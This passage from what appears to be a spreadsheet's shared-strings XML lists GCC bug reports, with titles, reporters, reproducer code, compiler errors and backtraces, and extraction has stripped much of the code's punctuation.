   name here) -Wno-non-template-friend disables this warning.
IMPORTANTE PARTE
/tmp/ccxZWYam.o: In function `main':
/tmp/ccxZWYam.o(.text+0x4d): undefined reference to `operator==(Complex const&amp; Complex const&amp;)'
collect2: ld returned 1 exit status
Release:
gcc version 3.0.4
Environment:
conectiva linux
2.2.17-14cl #1 qui nov 2 00:24:54 EST 2000 i686 
and mandrake 8.1 2.4.8
How-To-Repeat:
#include 
template  
   class Complex
{
  public:
  T ab
  Complex(T T)
  T Real()
  T Imag()
  friend bool operator==(const Complex  
}
template 
Complex::Complex(T xT y)
{ 
  a = x
  b = y
  }
template   
T Complex::Real()
  { 
     return a
     }
template       
T Complex::Imag()
  { 
     return b
     }     
template 
 bool operator ==(const Complex &amp;Caconst Complex &amp;Cb)
  {
    if (Ca.a == Cb.a &amp;&amp; Ca.b==Cb.b)
      return true
    else 
      return false
}
int main(int argc char **argv)
{
  float ab
  a=2.
  b=3.
  Complex ci(ab)
  Complex cj(ab)
  if(ci==cj)
    cout&lt;&lt;  same Numbers &lt;&lt;endl
  else
    cout &lt;&lt; numbers not the same &lt;&lt; endl
  cout&lt;&lt; ci.Real() &lt;&lt;  +  &lt;&lt; ci.Imag() &lt;&lt; endl   
  }</t>
  </si>
  <si>
    <t>onofre</t>
  </si>
  <si>
    <t>GCC-80421</t>
  </si>
  <si>
    <t>[5 Regression] Case dispatch is scrambled in switch-statement</t>
  </si>
  <si>
    <t>Created attachment 41196
Source code to demonstrate the bug
the exact version of GCC
the system type
the options given when GCC was configured/built
the complete command line that triggers the bug
the compiler output (error messages warnings etc.) and
the preprocessed file (*.i*) that triggers the bug generated by adding -save-temps to the complete compilation command or in the case of a bug report for the GNAT front end a complete set of source files (see below).</t>
  </si>
  <si>
    <t>ivan_j_johnson</t>
  </si>
  <si>
    <t>GCC-16164</t>
  </si>
  <si>
    <t>[4.0 Regression] automake 1.8.5 upgrade changed fastjar into a read-write source directory</t>
  </si>
  <si>
    <t>Compiling the mainline sources now writes fastjar/fastjar.info into the source
directory instead of the build directory which is against one of the GCC build
goals which were implemented for the GCC 3.4 release series.
This occured after the upgrade from automake 1.7.x to 1.8.x.</t>
  </si>
  <si>
    <t>GCC-33682</t>
  </si>
  <si>
    <t>libstdc++ broken for  !__GTHREAD_HAS_COND hosts</t>
  </si>
  <si>
    <t>../../../../gcc/libstdc++-v3/libsupc++/guard.cc:68: error: expected
initializer before '*' token
../../../../gcc/libstdc++-v3/libsupc++/guard.cc:71: error: '__cond' is
not a member of '__gnu_cxx'
../../../../gcc/libstdc++-v3/libsupc++/guard.cc:72: error: '__cond' is
not a member of '__gnu_cxx'
../../../../gcc/libstdc++-v3/libsupc++/guard.cc:73: error:
'fake_cond_t' does not name a type
../../../../gcc/libstdc++-v3/libsupc++/guard.cc: In function
'void::init_static_cond()':
../../../../gcc/libstdc++-v3/libsupc++/guard.cc:76: error:
'static_cond' was not declared in this scope</t>
  </si>
  <si>
    <t>GCC-1121</t>
  </si>
  <si>
    <t>gcj rejects legal assignments to final variables in private methods</t>
  </si>
  <si>
    <t>Please refer to
http://sourceware.cygnus.com/ml/java-discuss/1999-q4/msg00221.html
Release:
CVS
Environment:
Linux</t>
  </si>
  <si>
    <t>gback</t>
  </si>
  <si>
    <t>GCC-65707</t>
  </si>
  <si>
    <t>internal compiler error: in unify at cp/pt.c:18577</t>
  </si>
  <si>
    <t>The following code triggers an ICE on GCC trunk:
------------------------------------------------------------------------------
#include 
template 
struct when
template 
struct always_true : std::true_type { }
template &gt;
struct f
template 
struct f{}&gt;&gt; { }
template struct f
------------------------------------------------------------------------------
The exact command line is:
â€º ~/code/gcc5/bin/g++ ~/code/hana/test/worksheet.cpp -std=c++1y
[...]: internal compiler error: in unify at cp/pt.c:18577
 template struct f
                 ^
Note that changing
    when{}&gt;
to
    when{}()&gt;
fixes the problem.</t>
  </si>
  <si>
    <t>GCC-83862</t>
  </si>
  <si>
    <t>powerpc: ICE in signbit testcase</t>
  </si>
  <si>
    <t>&gt; cat t.c
#define _GNU_SOURCE
#include 
#include 
#include 
struct test_f_i_data
{
  const char *arg_str
  long double arg
  int expected
  int exceptions
}
static const struct test_f_i_data test_data[] =
  {
    { 1 0 0 0x8000 } 
    { 1 0 0 0x8000 } 
    { 1 0 0 0x8000 }
  }
void
check_bool (const char *test_name int computed int expected
            int exceptions)
{
      printf ( is:         %d\n computed)
      printf ( should be:  %d\n expected)
}
int
main (int argc char **argv)
{
  for (size_t i = 0 i &lt; sizeof (test_data) / sizeof (test_data)[0] i++)
   {
   char *test_name
   asprintf (
   check_bool (test_name signbit ((test_data)[i].arg)
      (test_data)[i].expected (test_data)[i].exceptions)
   free (test_name)
   }
}
&gt; gcc-8 --version
gcc-8 (SUSE Linux) 8.0.0 20180102 (experimental) [trunk revision 256068]
Copyright (C) 2017 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
&gt; gcc-8  -o t -g -mabi=ieeelongdouble -Wno-psabi t.c
&gt; gcc-8  -o t -g -O2  t.c 
&gt; gcc-8  -o t -g -O2 -mabi=ieeelongdouble -Wno-psabi t.c 
during RTL pass: split2
t.c: In function â€˜mainâ€™:
t.c:39:1: internal compiler error: in change_address_1 at emit-rtl.c:2268
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>raji</t>
  </si>
  <si>
    <t>GCC-30077</t>
  </si>
  <si>
    <t>g++.dg/tree-ssa/pr28003.C fails now on spu-elf</t>
  </si>
  <si>
    <t>/home/apinski/src/fsf/gcc/gcc/gcc/testsuite/g++.dg/tree-ssa/pr28003.C: In function 'void __static_initialization_and_destruction_0(int int)':^M
/home/apinski/src/fsf/gcc/gcc/gcc/testsuite/g++.dg/tree-ssa/pr28003.C:31: error: insn does not satisfy its constraints:^M
(insn 2532 672 2533 4 (set (reg:SI 3 $3)^M
        (high:SI (const:SI (plus:SI (symbol_ref:SI (b) [flags 0x2] )^M
                    (const_int 636 [0x27c]))))) 6 {_movsi} (nil)^M
    (nil))^M</t>
  </si>
  <si>
    <t>GCC-78918</t>
  </si>
  <si>
    <t>missing -Wrestrict on memcpy copying over self</t>
  </si>
  <si>
    <t>Calling memcpy to copy objects that overlap violates the strict aliasing rules and is undefined.  As the dump below shows GCC eliminates some such calls implying it knows the objects overlap (even though optimizing undefined code seems questionable) but it doesn't issue any diagnostic.  With the -Wrestrict warning GCC should flag at least the basic cases.
$ cat z.c &amp;&amp; gcc -O2 -S -Wall -Wextra -Wpedantic -Wrestrict -fdump-tree-optimized=/dev/stdout z.c
void f (void *p void *q unsigned n)
{
  p = q
  __builtin_memcpy (p q n)
}
 Function f (f funcdef_no=0 decl_uid=1797 cgraph_uid=0 symbol_order=0)
f (void * p void * q unsigned int n)
{
   [100.00%]:
  return
}</t>
  </si>
  <si>
    <t>GCC-27951</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] ICE with invalid anonymous union</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE in the C++ frontend since
GCC 4.0.0:
======================================
void foo()
{
    int i
    union { int i }
}
======================================
bug.cc: In function 'void foo()':
bug.cc:4: error: redeclaration of 'int i'
bug.cc:3: error: 'int i' previously declared here
bug.cc:4: internal compiler error: tree check: expected tree that contains 'decl minimal' structure have 'error_mark'  in finish_anon_union at cp/decl2.c:1121
Please submit a full bug report [etc.]
Will post a patch soon.</t>
  </si>
  <si>
    <t>GCC-37922</t>
  </si>
  <si>
    <t>[4.3 Regression] code generation error</t>
  </si>
  <si>
    <t>Platform:
  Fedora release 8 (Werewolf)
  Linux chevy.lbl.gov 2.6.23.15-137.fc8 #1 SMP Sun Feb 10 17:03:13 EST 2008 x86_64 x86_64 x86_64 GNU/Linux
% g++ -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /net/chevy/raid1/rwgk/gcc_trunk/configure --prefix=/net/cci-filer1/vol1/tmp/rwgk/gcc_trunk_141361_fc8_x86_64 --enable-languages=cc++fortran
Thread model: posix
gcc version 4.4.0 20081025 (experimental) (GCC) 
Problematic C++ code fragment:
    rot_mx proper_r = r
    int proper_order = type_
    if (proper_order &lt; 0) {
      std::cout &lt;&lt; A branch &lt;&lt; std::endl
      proper_order *= -1
      proper_r = -proper_r
    }
    if (proper_order &gt; 1) {
      std::cout &lt;&lt; B branch &lt;&lt; std::endl
      ...
    }
Compiled with (just to show optimization options please ignore the rest):
g++ -o cctbx/sgtbx/rot_mx_info.o -c -fno-strict-aliasing -fPIC -ftemplate-depth-120 -w -DNDEBUG -O3 -ffast-math -fno-associative-math -ftrapping-math -DBOOST_DISABLE_THREADS -fopenmp -Iinclude -I/net/chevy/raid1/rwgk/hot/include -I/net/chevy/raid1/rwgk/as_in_cvs/include -I/net/chevy/raid1/rwgk/hot/b u f/include -I/net/chevy/raid1/rwgk/as_in_cvs -I/net/chevy/raid1/rwgk/hot/boost /net/chevy/raid1/rwgk/as_in_cvs/cctbx/sgtbx/rot_mx_info.cpp
Given type_ = -2 the print statements should show
A branch
B branch
but only B branch is actually shown.
I can work around this problem either by compiling without optimizations or by replacing the code above with:
    rot_mx proper_r
    int proper_order
    if (type_ &lt; 0) {
      std::cout &lt;&lt; A branch &lt;&lt; std::endl
      proper_order = -type_
      proper_r = -r
    }
    else {
      std::cout &lt;&lt; A else branch &lt;&lt; std::endl
      proper_order = type_
      proper_r = r
    }
    if (proper_order &gt; 1) {
      std::cout &lt;&lt; B branch &lt;&lt; std::endl
      ...
    }
I tried to reduce the problem but it turns out to be tricky. The code above is part of a shared library (.so). Simply moving it into the same translation unit as the calling code makes the error go away.
Before I spend more time on this does the problem look familiar? (I.e. could it be that this bug was reported already?)
I could give you a self-contained but very large reproducer. This would enable you to inspect the generated code and maybe give us a clue how to construct a minimal reproducer.</t>
  </si>
  <si>
    <t>GCC-43738</t>
  </si>
  <si>
    <t>basic_file_stdio.cc uses ioctl on a fd but not available on mingw32</t>
  </si>
  <si>
    <t>basic_file_stdio.cc in __basic_file::showmanyc()
uses ioctl with FIONREAD but the equivalent on win32 is ioctlsocket
perhaps not usable here because I think there is not support for socket here in gcc (I'm wrong?)
anyway it does not compiles
I solve this by commenting out that part
    int __r = ioctl(this-&gt;fd() FIONREAD 
    if (!__r &amp;&amp; __num &gt;= 0)
      return __num
the problem still there since 4.3 iirc I'm the only that noticed it?
there is something wrong in my setup?
my configure options:
../gcc/configure                            \
    --prefix=/mingw                         \
    --disable-bootstrap                     \
    --with-gnu-ld                           \
    --target=i686-pc-mingw32                \
    --with-tune=generic                     \
    --with-cpu=i686                         \
    --disable-cpp                           \
    --disable-win32-registry                \
    --disable-shared                        \
    --enable-static                         \
    --program-suffix=-4.6                   \
    --enable-version-specific-runtime-libs  \
    --enable-languages=cc++                \
    --enable-cld                            \
    --enable-__cxa_atexit                   \
    --disable-werror                        \
    --disable-checking                      \
    --enable-multilib                       \
    --enable-threads=posix                  \
    --disable-libssp                        \
    --with-dwarf2                           \
    --disable-nls                           \
    --with-ppl                              \
    --disable-cloog                         \
    --enable-libgomp</t>
  </si>
  <si>
    <t>GCC-12647</t>
  </si>
  <si>
    <t>[win32] wait() does not release monitor correctly</t>
  </si>
  <si>
    <t>On Windows (I used the MinGW version 3.3.1 of gcj) there's a bug if a
synchronized method calls wait(). If the method containing wait() was invoked by
another synchronized method of the same object then the calling thread keeps
the lock on this object.
Example program:
If you run this with the Java 1.4.1 VM on Windows the output is
a
c
c
c
...
If compiled with GCJ on Windows the output is only
a
Code of the example program:
public class Test
{
  public static void main(String args[])
  {
    Test test = new Test()
    new MyThread(test).start()
    while(true)
    {
      try
      {
        Thread.sleep(1000)
      }
      catch (Exception e)
      {
        e.printStackTrace()
      }
      test.c()
    }
  }
  public synchronized void a()
  {
    System.out.println(a)
    b()
  }
  public synchronized void b()
  {
    try
    {
      wait()
    }
    catch (Exception e)
    {
      e.printStackTrace()
    }
    System.out.println(b)
  }
  public synchronized void c()
  {
    System.out.println(c)
  }
}
class MyThread extends Thread
{
  private Test test
  public MyThread(Test test)
  {
    this.test = test
  }
  public void run()
  {
    test.a()
  }
}</t>
  </si>
  <si>
    <t>membar</t>
  </si>
  <si>
    <t>mkaufmann</t>
  </si>
  <si>
    <t>GCC-36319</t>
  </si>
  <si>
    <t>Segfault with wide characters in DATA</t>
  </si>
  <si>
    <t>The following code draws a compile time segfault.  This is derived from data_array_1.f90 that I have modified while working on wide character I/O.
program chkdata
    integer parameterdimension(4) :: myint = [ 4321 ]
    character(len=3 kind=4) parameter dimension(3) :: mychar = [ abc def ghi ]
    character(50) :: buffer
    integer :: a(5)
    character(5) :: c(5)
    data a(1:2) / myint(4) myint(2) /
    data a(3:5) / myint(1) myint(3) myint(1) /
    data c / mychar(1) mychar(2) mychar(3) mychar(1) mychar(2) /
    buffer = 
    if (any(a.ne.[13424])) call abort
    write(buffer'(5(a))')c
    if (buffer.ne.abc  def  ghi  abc  def  ) call abort
end program chkdata
Starting program: /home/jerry/bin/f951 test2.f90
Program received signal SIGSEGV Segmentation fault.
0x0000003ff067b40b in memcpy () from /lib64/libc.so.6
Missing separate debuginfos use: debuginfo-install gmp.x86_64 mpfr.x86_64
(gdb) bt
#0  0x0000003ff067b40b in memcpy () from /lib64/libc.so.6
#1  0x000000000046875e in gfc_convert_char_constant (e=0x106d6d0 
    type= kind=4)
    at ../../gcc44/gcc/fortran/simplify.c:4832
#2  0x000000000042a901 in do_simplify (specific=0x1068ba0 e=0x106d9a0)
    at ../../gcc44/gcc/fortran/intrinsic.c:3286
#3  0x000000000042ac11 in gfc_convert_chartype (expr=0x106d9a0 
    ts=0x7ffffad42a58) at ../../gcc44/gcc/fortran/intrinsic.c:3820
#4  0x000000000042286d in gfc_check_assign (lvalue=0x7ffffad42a50 
    rvalue=0x106d9a0 conform=1) at ../../gcc44/gcc/fortran/expr.c:2855
#5  0x00000000004229a0 in gfc_check_assign_symbol (sym=0x106d530 
    rvalue=0x106d9a0) at ../../gcc44/gcc/fortran/expr.c:3029
#6  0x000000000041963d in add_init_expr_to_sym (name= 
    initp=0x7ffffad42c50 var_locus=0x7ffffad42c10)
    at ../../gcc44/gcc/fortran/decl.c:1231
#7  0x000000000041a01d in gfc_match_data_decl ()
    at ../../gcc44/gcc/fortran/decl.c:1776
#8  0x00000000004512d3 in match_word (str=0x2aaaaf664010  
    subr=0x419da0  old_locus=0x7ffffad42cd0)
    at ../../gcc44/gcc/fortran/parse.c:64
#9  0x00000000004518a3 in decode_statement ()
    at ../../gcc44/gcc/fortran/parse.c:280
#10 0x000000000045292b in next_statement ()</t>
  </si>
  <si>
    <t>GCC-1089</t>
  </si>
  <si>
    <t>ios_base::_M_grow_words(int ix) SEGV's w/fix</t>
  </si>
  <si>
    <t>Attached test code ofs.cc SEGV's when run.
Release:
gcc version 2.97 20001213 (experimental)
Environment:
SuSE 7.0 glibc 2.1.3 linux 2.2.16
How-To-Repeat:
% c++ -O0 -g    ofs.cc   -o ofs
% ./ofs</t>
  </si>
  <si>
    <t>cljanss</t>
  </si>
  <si>
    <t>GCC-59207</t>
  </si>
  <si>
    <t>[4.8/4.9 regression] uninitialized local variable in sparc_fold_builtin</t>
  </si>
  <si>
    <t>I just ran the static analyser over the trunk source code.
It said
[trunk/gcc/config/sparc/sparc.c:10663]: (error) Uninitialized variable: neg2_ovf
Source code is
          bool neg1_ovf neg2_ovf add1_ovf add2_ovf
          tmp = e1.neg_with_overflow (
          tmp = e0.add_with_sign (tmp false 
          if (tmp.is_negative ())
        tmp = tmp.neg_with_overflow (
          result = result.add_with_sign (tmp false 
          overflow |= neg1_ovf | neg2_ovf | add1_ovf | add2_ovf
Since neg2_ovf is only conditionally initialised suggest initialise
at its declaration. Like
          bool neg1_ovf neg2_ovf = false add1_ovf add2_ovf</t>
  </si>
  <si>
    <t>GCC-6149</t>
  </si>
  <si>
    <t>Bug#105309: Info received and FILED only</t>
  </si>
  <si>
    <t xml:space="preserve"> Thank you for the additional information you have supplied regarding
 this problem report.  It has NOT been forwarded to the developers but
 will accompany the original report in the Bug tracking system.  Please
 ensure that you yourself have sent a copy of the additional
 information to any relevant developers or mailing lists.
 If you wish to continue to submit further information on your problem
 please send it to 105309-quiet@bugs.debian.org as before.
 Please do not reply to the address at the top of this message
 unless you wish to report a problem with the Bug-tracking system.
 Debian bug tracking system administrator
 (administrator Debian Bugs database)
Release:
unknown
Unformatted:
          (was pending/6140: Bug#105309: Info received and FILED only)</t>
  </si>
  <si>
    <t>105309-quiet</t>
  </si>
  <si>
    <t>GCC-53992</t>
  </si>
  <si>
    <t>Combining -fopenmp and -fgnu-tm results in segfault or misbehaving binaries</t>
  </si>
  <si>
    <t>Created attachment 27808
Preprocessed source
Hi
is the combination of -fopenmp and -fgnu-tm supported? Otherwise maybe some error message explaining that it's not would be appropriate? Attached is a case that makes gcc segfault:
$ gcc -v -fopenmp -fgnu-tm  min.c &amp;&amp; ./a.out 
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.7/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.7.1-2' --with-bugurl=file:///usr/share/doc/gcc-4.7/README.Bugs --enable-languages=cc++gofortranobjcobj-c++ --prefix=/usr --program-suffix=-4.7 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.7 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.7.1 (Debian 4.7.1-2) 
COLLECT_GCC_OPTIONS='-v' '-fopenmp' '-fgnu-tm' '-mtune=generic' '-march=x86-64' '-pthread' '-pthread'
 /usr/lib/gcc/x86_64-linux-gnu/4.7/cc1 -quiet -v -imultiarch x86_64-linux-gnu -D_REENTRANT min.c -quiet -dumpbase min.c -mtune=generic -march=x86-64 -auxbase min -version -fopenmp -fgnu-tm -o /tmp/ccsCNMGH.s
GNU C (Debian 4.7.1-2) version 4.7.1 (x86_64-linux-gnu)
	compiled by GNU C version 4.7.1 GMP version 5.0.5 MPFR version 3.1.0-p10 MPC version 0.9
warning: GMP header version 5.0.5 differs from library version 5.0.4.
warning: MPFR header version 3.1.0-p10 differs from library version 3.1.0-p3.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../../x86_64-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/x86_64-linux-gnu/4.7/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/4.7/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
GNU C (Debian 4.7.1-2) version 4.7.1 (x86_64-linux-gnu)
	compiled by GNU C version 4.7.1 GMP version 5.0.5 MPFR version 3.1.0-p10 MPC version 0.9
warning: GMP header version 5.0.5 differs from library version 5.0.4.
warning: MPFR header version 3.1.0-p10 differs from library version 3.1.0-p3.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 9e08a85d4bf68460be9df04a431a25b0
min.c: In function â€˜mainâ€™:
min.c:16:5: warning: incompatible implicit declaration of built-in function â€˜printfâ€™ [enabled by default]
min.c: In function â€˜main._omp_fn.0â€™:
min.c:8:13: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cczZfnZg.out file please attach this to your bugreport.
If -O3 is enabled a binary is produced but it misbehaves:
$ gcc -v -fopenmp -fgnu-tm  -O3 min.c 
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.7/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.7.1-2' --with-bugurl=file:///usr/share/doc/gcc-4.7/README.Bugs --enable-languages=cc++gofortranobjcobj-c++ --prefix=/usr --program-suffix=-4.7 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.7 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.7.1 (Debian 4.7.1-2) 
COLLECT_GCC_OPTIONS='-v' '-fopenmp' '-fgnu-tm' '-O3' '-mtune=generic' '-march=x86-64' '-pthread' '-pthread'
 /usr/lib/gcc/x86_64-linux-gnu/4.7/cc1 -quiet -v -imultiarch x86_64-linux-gnu -D_REENTRANT min.c -quiet -dumpbase min.c -mtune=generic -march=x86-64 -auxbase min -O3 -version -fopenmp -fgnu-tm -o /tmp/ccwYfizG.s
GNU C (Debian 4.7.1-2) version 4.7.1 (x86_64-linux-gnu)
	compiled by GNU C version 4.7.1 GMP version 5.0.5 MPFR version 3.1.0-p10 MPC version 0.9
warning: GMP header version 5.0.5 differs from library version 5.0.4.
warning: MPFR header version 3.1.0-p10 differs from library version 3.1.0-p3.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../../x86_64-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/x86_64-linux-gnu/4.7/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/4.7/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
GNU C (Debian 4.7.1-2) version 4.7.1 (x86_64-linux-gnu)
	compiled by GNU C version 4.7.1 GMP version 5.0.5 MPFR version 3.1.0-p10 MPC version 0.9
warning: GMP header version 5.0.5 differs from library version 5.0.4.
warning: MPFR header version 3.1.0-p10 differs from library version 3.1.0-p3.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 9e08a85d4bf68460be9df04a431a25b0
min.c: In function â€˜mainâ€™:
min.c:16:5: warning: incompatible implicit declaration of built-in function â€˜printfâ€™ [enabled by default]
COLLECT_GCC_OPTIONS='-v' '-fopenmp' '-fgnu-tm' '-O3' '-mtune=generic' '-march=x86-64' '-pthread' '-pthread'
 as -v --64 -o /tmp/cc3HGMmf.o /tmp/ccwYfizG.s
GNU assembler version 2.22 (x86_64-linux-gnu) using BFD version (GNU Binutils for Debian) 2.22
COMPILER_PATH=/usr/lib/gcc/x86_64-linux-gnu/4.7/:/usr/lib/gcc/x86_64-linux-gnu/4.7/:/usr/lib/gcc/x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.7/:/usr/lib/gcc/x86_64-linux-gnu/
LIBRARY_PATH=/usr/lib/gcc/x86_64-linux-gnu/4.7/:/usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.7/../../../../lib/:/lib/x86_64-linux-gnu/:/lib/../lib/:/usr/lib/x86_64-linux-gnu/:/usr/lib/../lib/:/usr/lib/gcc/x86_64-linux-gnu/4.7/../../../:/lib/:/usr/lib/
Reading specs from /usr/lib/gcc/x86_64-linux-gnu/4.7/libgomp.spec
Reading specs from /usr/lib/gcc/x86_64-linux-gnu/4.7/libitm.spec
COLLECT_GCC_OPTIONS='-v' '-fopenmp' '-fgnu-tm' '-O3' '-mtune=generic' '-march=x86-64' '-pthread' '-pthread'
 /usr/lib/gcc/x86_64-linux-gnu/4.7/collect2 --sysroot=/ --build-id --no-add-needed --eh-frame-hdr -m elf_x86_64 --hash-style=both -dynamic-linker /lib64/ld-linux-x86-64.so.2 /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/crt1.o /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/4.7/crtbegin.o -L/usr/lib/gcc/x86_64-linux-gnu/4.7 -L/usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/4.7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/4.7/../../.. /tmp/cc3HGMmf.o -lgomp -litm -lgcc --as-needed -lgcc_s --no-as-needed -lpthread -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/x86_64-linux-gnu/4.7/crtend.o /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../x86_64-linux-gnu/crtn.o
$ ./a.out 
10000
Expected result was -9999</t>
  </si>
  <si>
    <t>hakan</t>
  </si>
  <si>
    <t>GCC-60438</t>
  </si>
  <si>
    <t>[4.9 Regression] dwarf2cfi :2239 still assertnot the same cause as PR 59575</t>
  </si>
  <si>
    <t>This Bug is cause by csa pass.Which removes REG_ARGS_SIZE unexpectedly.
Let me show the cfg first:
                                            if (hasRelativeWidth || hasRelativeHeight)
                                            true                                false
                                            /                                       \
                                           /                                         \ 
                                          /                                           \
                            ...                                                     ...
                           call availableWidth()                                        call size() this function returns a structurewhich matches call_pop  
                           .cfa_offset 96                                           .cfa_offset 92
                                                                                    push edx (should has a REG_ARGS_SIZE 16 herebut csa eliminates it)
                                          \                                         (inlined functions are expanded here)
                                           \                                            /
                                            \                                          /
                                             \                                        /
                                                        add 16%esp
After the csa pass push edx's REG_ARGS_SIZE has gone.
And that further causes the assertion in dwarf2cfi.c:2339:
      /* We ought to have the same state incoming to a given trace no
	 matter how we arrive at the trace.  Anything else means we've
	 got some kind of optimization error.  */
      gcc_checking_assert (cfi_row_equal_p (cur_row ti-&gt;beg_row))
gcc is configured as :
--target=i686-linux-android --host=x86_64-linux-gnu --build=x86_64-linux-gnu --with-gnu-as --with-gnu-ld --enable-languages=cc++ --with-host-libstdcxx='-static-libgcc -Wl-Bstatic-lstdc++-Bdynamic -lm' --disable-libssp --enable-threads --disable-nls --disable-libmudflap --disable-libgomp --disable-sjlj-exceptions --disable-tls --disable-libitm --with-arch=i686 --with-tune=atom --with-fpmath=sse --enable-initfini-array --disable-nls --with-sysroot=/home/linzj/android-ndk-r8e/platforms/android-9/arch-x86 --disable-bootstrap --disable-libquadmath --enable-plugins --enable-libgomp --enable-gold --enable-graphite=yes --program-transform-name='s&amp;^&amp;i686-linux-android-&amp;' --enable-gold=default --disable-libcilkrts : (reconfigured) ../building/configure --target=i686-linux-android --host=x86_64-linux-gnu --build=x86_64-linux-gnu --with-gnu-as --with-gnu-ld --enable-languages=cc++ --with-host-libstdcxx='-static-libgcc -Wl-Bstatic-lstdc++-Bdynamic -lm' --disable-libssp --enable-threads --disable-nls --disable-libmudflap --disable-libgomp --disable-sjlj-exceptions --disable-tls --disable-libitm --with-arch=i686 --with-tune=atom --with-fpmath=sse --enable-initfini-array --disable-nls --with-sysroot=/home/linzj/android-ndk-r8e/platforms/android-9/arch-x86 --disable-bootstrap --disable-libquadmath --enable-plugins --enable-libgomp --enable-gold --enable-graphite=yes --program-transform-name='s&amp;^&amp;i686-linux-android-&amp;' --enable-gold=default --disable-libcilkrts
compile args:
-ffunction-sections -funwind-tables -no-canonical-prefixes -fstack-protector -fno-exceptions -fno-rtti -O2 -g -fomit-frame-pointer -fstrict-aliasing -funswitch-loops -finline-limit=300 -gdwarf-2 -funwind-tables -fno-pic -fPIC -fno-stack-protector -fvisibility=hidden -gdwarf-2 -funwind-tables -fno-pic -fPIC -fno-stack-protector -fvisibility=hidden -fvisibility-inlines-hidden -Wa--noexecstack   -Os -Wreturn-type -Wuninitialized -c</t>
  </si>
  <si>
    <t>manjian2006</t>
  </si>
  <si>
    <t>GCC-46221</t>
  </si>
  <si>
    <t>[4.6 Regression] huge number of c++ testsuite failures libstdc++.so alias missing</t>
  </si>
  <si>
    <t>Created attachment 22196
locale-inst.ii
Current mainline miscompiles locale-inst.cc resulting in most c++ tests complaining
/home/alan/build/ppc/gcc-curr/powerpc-linux/./libstdc++-v3/src/.libs/libstdc++.so: undefined reference to `std::ostreambuf_iterator &gt; std::num_put &gt; &gt;::_M_insert_float(std::ostreambuf_iterator &gt; std::ios_base&amp; wchar_t char long double) const'
Ah I thought long double compat missing but _GLIBCXX_LONG_DOUBLE_COMPAT is defined and preprocessed locale-inst.cc shows the alias is there
extern C void _ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIeEES3_S3_RSt8ios_baseccT_ (void) __attribute__ ((alias (_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_) weak))
but no sign of it in the assembly output.</t>
  </si>
  <si>
    <t>GCC-41297</t>
  </si>
  <si>
    <t>[4.5 Regression] Functions are called twice</t>
  </si>
  <si>
    <t>In the following program the function should only be called once. However with GCC 4.5 the function is called twice (see dump).
MAIN__ ()
{
  struct fgsl_interp interp
  {
